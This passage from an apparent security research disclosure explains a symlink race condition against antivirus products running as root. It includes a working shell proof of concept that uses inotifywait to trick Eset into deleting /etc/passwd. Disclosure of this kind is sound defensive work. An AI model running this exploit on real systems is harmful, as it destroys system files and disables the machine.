This exploit was used against Kaspersky Internet Security for macOS and downloads the EICAR test-string from an alternate source (Pastebin) to bypass real-time protection that prohibits downloading the test-string from the official website.

Once the test-string has been downloaded, the antivirus software immediately detects the file as malware and attempts to clean it up. In our testing, we were able to identify an approximate delay of 6-8 seconds that allows a race condition to occur that can result in a symlink attack causing any file to be removed due to the fact that the software runs as root.

Linux Notes:

It’s worth noting that the above Proof of Concept for macOS also works for some Linux antivirus software. In our testing, we were able to delete important files that would have rendered either the antivirus software or the operating system inoperable given that most file operations run as the root user.

One of the benefits of exploiting antivirus software for Linux is the wide range of available tools to help with the race condition timings. In our case, we found the use of ‘inotifywait’ to be extremely helpful. For example, the following Proof of Concept worked against Eset File Server Security:

#!/bin/sh

rm -rf /home/user/exploit ; mkdir /home/user/exploit/

wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd

while inotifywait -m “/home/user/exploit/passwd” | grep -m 5 “OPEN”

do

rm -rf /home/user/exploit ; ln -s /etc /home/user/exploit

done

What the above Proof of Concept does is monitor the EICAR test-string that was downloaded to a file called passwd. With the help of ‘inotifywait’ the malicious passwd file is monitored for OPEN file operations. After the 5th OPEN the actual symlink attack takes place which then causes the system /etc/passwd to be removed causing a Denial of Service attack against the operating system.